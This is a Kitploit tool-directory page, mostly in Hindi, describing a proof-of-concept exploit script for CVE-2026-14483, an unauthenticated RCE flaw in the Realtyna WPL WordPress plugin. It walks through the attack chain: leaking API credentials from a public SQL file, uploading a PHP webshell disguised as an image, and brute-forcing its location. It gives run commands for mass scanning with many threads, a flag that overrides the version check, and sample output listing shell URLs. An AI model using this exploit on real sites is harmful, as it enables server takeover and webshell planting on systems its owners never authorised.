Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-14483 — CVE-2026-14483 POC EXPLOIT BY MADEXPLOITS | Kitploit
उपकरण/GitHubGitHub/madexploits/cve-2026-14483
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingPayload Development
GitHubmadexploits/cve-2026-14483

CVE-2026-14483

CVE-2026-14483 POC EXPLOIT BY MADEXPLOITS

रिपॉजिटरी देखें
118 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-14483 — WPL रियल एस्टेट RCE

Realtyna WPL रियल एस्टेट लिस्टिंग WordPress प्लगइन के विरुद्ध बिना प्रमाणीकरण के रिमोट कोड निष्पादन।

फ़ील्डविवरण
CVECVE-2026-14483
प्रभावित संस्करण<= 5.2.0
प्लगइनreal-estate-listing-realtyna-wpl
प्रभावबिना प्रमाणीकरण के PHP वेबशेल अपलोड (RCE)
स्क्रिप्टCVE-2026-14483.py
लेखकMADEXPLOITS

डिफ़ॉल्ट रूप से स्क्रिप्ट केवल WPL 5.2.0 चलाने वाले लक्ष्यों का शोषण करती है। ओवरराइड करने के लिए --force उपयोग करें।

चित्र


भेद्यता सारांश

  1. क्रेडेंशियल लीक — डिफ़ॉल्ट api_key / api_secret एक सार्वजनिक SQL माइग्रेशन डंप के माध्यम से उजागर होते हैं।
  2. बिना प्रमाणीकरण के अपलोड — वे क्रेडेंशियल WPL I/O API (set_property) को प्रमाणित करते हैं, जिससे एक क्राफ्टेड PHP फ़ाइल को संपत्ति छवि के रूप में अपलोड किया जा सकता है।
  3. वेबशेल खोज — अपलोड किया गया शेल wp-content/uploads/WPL/{property_id}/ के अंतर्गत स्थित होता है।

आवश्यकताएँ

root@kitploit:~
pip install requests colorama
  • Python 3.8+
  • लक्ष्य तक नेटवर्क पहुँच

उपयोग

लक्ष्य सूची

प्रति पंक्ति एक आधार URL वाली टेक्स्ट फ़ाइल बनाएँ:

root@kitploit:~
http://wplab.test
https://example.com

बुनियादी रन

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt

सफल शेल URL result.txt (या --output) में जोड़े जाते हैं।

पूर्ण विकल्प

root@kitploit:~
python CVE-2026-14483.py \
  --targets targets.txt \
  --output result.txt \
  --user-id 1 \
  --max-id 1000 \
  --timeout 30 \
  --threads 5 \
  --debug \
  --force

शोषण प्रवाह

root@kitploit:~
Target URL
    │
    ▼
Detect WPL version (readme.txt / wpl.php)
    │  skip unless == 5.2.0 (or --force)
    ▼
Fetch api_key + api_secret from:
  /wp-content/plugins/real-estate-listing-realtyna-wpl/assets/migrations/basic/1.0.0.sql
    │
    ▼
POST set_property via WPL I/O API
  (upload image_0x89MADEXPLOITS.php as image/jpeg)
    │
    ▼
Brute-force property ID 1..max-id
  /wp-content/uploads/WPL/{id}/0x89MADEXPLOITS.php
    │
    ▼
Write shell URL → output file

डिफ़ॉल्ट शेल मार्कर: MADEXPLOITS
डिफ़ॉल्ट रिमोट फ़ाइलनाम: 0x89MADEXPLOITS.php


उदाहरण

एकल लैब लक्ष्य (यह वर्कस्पेस):

root@kitploit:~
echo http://wplab.test > targets.txt
python CVE-2026-14483.py --targets targets.txt --debug

उच्च समवर्तीता के साथ बड़े पैमाने पर स्कैन:

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt --threads 20 --output shells.txt

संस्करण जाँच विफल होने पर शोषण बलपूर्वक करें:

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt --force

आउटपुट

root@kitploit:~
[+] Shell found: http://target/wp-content/uploads/WPL/32/0x89MADEXPLOITS.php
[*] Progress: 1/1 | Found: 1
[+] Done. Found 1 shell(s). Check 'result.txt' for URLs.

result.txt में प्रति पंक्ति एक शेल URL होता है।


नोट्स

  • संस्करण प्लगइन readme.txt में Stable tag: / Version: से पढ़ा जाता है, जिसमें wpl.php का फ़ॉलबैक होता है।
  • यदि अपलोड के बाद शेल नहीं मिलता है, तो --max-id बढ़ाएँ।
  • केवल अधिकृत सुरक्षा परीक्षण / स्थानीय लैब उपयोग के लिए है।
टूल डाउनलोड करें
तर्कडिफ़ॉल्टविवरण
--targets(आवश्यक)आधार URL वाली फ़ाइल (प्रति पंक्ति एक)
--outputresult.txtमिले शेल URL जोड़ने के लिए फ़ाइल
--user-id1WordPress / WPL उपयोगकर्ता ID जो नई संपत्ति का स्वामी है
--payloadअंतर्निहित अपलोड शेलकस्टम PHP पेलोड स्ट्रिंग
--max-id1000शेल का पता लगाते समय ब्रूट-फोर्स करने के लिए अधिकतम संपत्ति ID
--timeout30सेकंड में HTTP टाइमआउट
--threads5समवर्ती कार्यकर्ता थ्रेड
--debugबंदविस्तृत डीबग लॉगिंग
--forceबंदशोषण करें भले ही संस्करण ≠ 5.2.0 हो या संस्करण का पता न चल सके